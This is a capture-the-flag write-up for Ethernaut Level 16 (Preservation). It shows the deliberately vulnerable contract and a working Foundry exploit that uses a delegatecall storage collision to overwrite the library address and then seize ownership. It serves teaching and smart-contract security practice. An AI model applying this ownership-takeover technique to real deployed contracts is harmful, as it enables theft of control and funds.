Level 16 - Preservation ⏺⏺⏺⏺

Level Setup

This contract utilizes a library to store two different times for two different timezones. The constructor creates two instances of the library for each time to be stored.

The goal of this level is for you to claim ownership of the instance you are given.

Things that might help

Look into Solidity's documentation on the delegatecall low level function, how it works, how it can be used to delegate operations to on-chain. libraries, and what implications it has on execution scope.
Understanding what it means for delegatecall to be context-preserving.
Understanding how storage variables are stored and accessed.
Understanding how casting works between different data types.

Level Contract

ethernaut/contracts/src/levels/Preservation.sol at a89c8f7832258655c09fde16e6602c78e5e99dbd · OpenZeppelin/ethernautGitHub

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Preservation {
    // public library contracts
    address public timeZone1Library;
    address public timeZone2Library;
    address public owner;
    uint256 storedTime;
    // Sets the function signature for delegatecall
    bytes4 constant setTimeSignature = bytes4(keccak256("setTime(uint256)"));

    constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) {
        timeZone1Library = _timeZone1LibraryAddress;
        timeZone2Library = _timeZone2LibraryAddress;
        owner = msg.sender;
    }

    // set the time for timezone 1
    function setFirstTime(uint256 _timeStamp) public {
        timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
    }

    // set the time for timezone 2
    function setSecondTime(uint256 _timeStamp) public {
        timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
    }
}

// Simple library contract to set the time
contract LibraryContract {
    // stores a timestamp
    uint256 storedTime;

    function setTime(uint256 _time) public {
        storedTime = _time;
    }
}

Exploit

make anvil-exploit-level-16

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>

ethernaut-foundry/src/Level16.sol at 597859bfacb216c601efbdc60b0546fad51b37cb · EridianAlpha/ethernaut-foundryGitHub

src/Level16.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Script, console} from "forge-std/Script.sol";

// ================================================================
// │                     LEVEL 16 - PRESERVATION                  │
// ================================================================
contract AttackContract {
    address public timeZone1Library;
    address public timeZone2Library;
    address public owner;

    function setTime(uint256 /* _time */ ) public {
        owner = msg.sender;
    }
}

ethernaut-foundry/script/Level16.s.sol at 597859bfacb216c601efbdc60b0546fad51b37cb · EridianAlpha/ethernaut-foundryGitHub

script/Level16.s.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Script, console} from "forge-std/Script.sol";
import {HelperFunctions} from "script/HelperFunctions.s.sol";

import {AttackContract} from "../src/Level16.sol";

// ================================================================
// │                     LEVEL 16 - PRESERVATION                  │
// ================================================================
interface IPreservation {
    function setFirstTime(uint256 _timeStamp) external;
}

contract Exploit is Script, HelperFunctions {
    function run() public {
        address targetContractAddress = getInstanceAddress();
        IPreservation preservation = IPreservation(targetContractAddress);

        vm.startBroadcast();
        AttackContract attackContract = new AttackContract();

        // Set the timeZone1Library to the address of the AttackContract
        preservation.setFirstTime(uint256(uint160(address(attackContract))));

        // Call the setFirstTime function again but this time it will delegate to the attackContract
        // which will set the owner to the msg.sender
        preservation.setFirstTime(1);
        vm.stopBroadcast();
    }
}

Submit instance... 🥳

Completion Message

As the previous level, delegate mentions, the use of delegatecall to call libraries can be risky. This is particularly true for contract libraries that have their own state. This example demonstrates why the library keyword should be used for building libraries, as it prevents the libraries from storing and accessing state variables.

Notes

ethernaut-openzeppelin-hacks/level_16_Preservation.md at e936301859334383d568a614084917100319205e · nvnx7/ethernaut-openzeppelin-hacksGitHub

Last updated 1 year ago